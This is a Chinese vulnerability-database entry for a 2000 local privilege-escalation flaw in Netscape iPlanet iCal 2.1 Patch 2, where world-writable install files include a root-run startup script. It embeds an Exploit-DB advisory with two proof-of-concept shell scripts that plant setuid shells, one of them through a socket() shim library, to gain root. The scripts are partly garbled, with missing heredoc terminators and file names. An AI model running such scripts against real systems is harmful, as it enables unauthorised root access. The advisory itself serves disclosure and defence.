发布时间 :2000-12-11 00:00:00
修订时间 :2008-09-05 16:22:34

[原文]iCal 2.1 Patch 2 installs many files with world-writeable permissions, which allows local users to modify the iCal configuration and execute arbitrary commands by replacing the program with a Trojan horse.


        iCal 2.1版本的Patch 2安装许多有全域可写许可的文件。本地用户通过用特洛伊木马病毒替换iplncal.sh程序修改iCal配置和执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  XF  ical-iplncal-gain-access

- 漏洞信息

高危 未知
2000-12-11 00:00:00 2005-05-02 00:00:00
        iCal 2.1版本的Patch 2安装许多有全域可写许可的文件。本地用户通过用特洛伊木马病毒替换iplncal.sh程序修改iCal配置和执行任意命令。

- 公告与补丁


- 漏洞信息 (20275)

Netscape iCal 2.1 Patch2 iPlanet iCal '' Permissions Vulnerability (EDBID:20275)
solaris local
2000-10-10 Verified
0 @stake
N/A [点击下载]

Netscape's iPlanet iCal application is a network based calendar service built for deployment in organizations which require a centralized calendar system. Certain versions of iCal ship with a vulnerability introduced in the installation process which will allow malicious local users to gain root on the system.

During the installation process a large number of files are left world readable and writable. One such file, /opt/SUNWicsrv/cal/bin/ is designed to be run at startup as root and is world writable by default. This allows users to modify the contents of this startup script and have it executed at boot up time or whenever the machine is re-initialized.

Proof of Concept Tools:

There are two scripts below, the first obtains an icsuser shell.
The second script is used to obtain root access the next time iCal is
stopped or started. The second script should be run once you've obtained
the shell and have become the icsuser. This second script creates a shim library with a modified socket() function that then
executes a shell script as root.

# Simple proof of concept exploit used to obtain icsuser shell.
INSTDIR=`cat /etc/iplncal.conf`

cat > cshttpd << FOOFOO
cp /usr/bin/ksh ./icsuser
chmod 4755 ./icsuser

chmod 755 ./cshttpd

echo "Executing csstart...."
$INSTDIR/cal/bin/csstart -v -p 1 -a 2 2>/dev/null

sleep 1
ls -al ./icsuser

# Simple iCal exploit. Become icsuser by running the shell created with
# the
# script, and then run this shell script. The next time that
# the
# service is started by root (ie. system reboot), a root owned suid shell
# will
# be created: /tmp/r00tshell. 

INSTDIR=`cat /etc/iplncal.conf`

#Create the shim library..

cat > libsushi.c << FOEFOE
/* libsushi
compile: gcc -shared -nostartfiles -nostdlib -fPIC -o libsushi
#include <unistd.h>
int socket(void)
return 0;

#create the shell script we'll be executing as root..

cat > $INSTDIR/cal/bin/icalroot << FOOFOO
cp /usr/bin/ksh /tmp/r00tshell
chmod 4755 /tmp/r00tshell
rm $INSTDIR/cal/bin/icalroot
rm $INSTDIR/cal/bin/
ls -l $INSTDIR/cal/bin/icalroot

echo ".. Now wait for the iCal service to start up again"

For more advisories:
PGP Key:		

- 漏洞信息

iCal Weak Permission Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

iPlanet iCal contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The problem is that the "" script is installed with insecure permissions by default and runs as root during startup. It is possible for a malicious user to manipulate the script and execute arbitrary code on the system with root privileges, resulting in a loss of integrity.

- 时间线

2000-10-09 Unknow
2000-10-09 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Sun has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者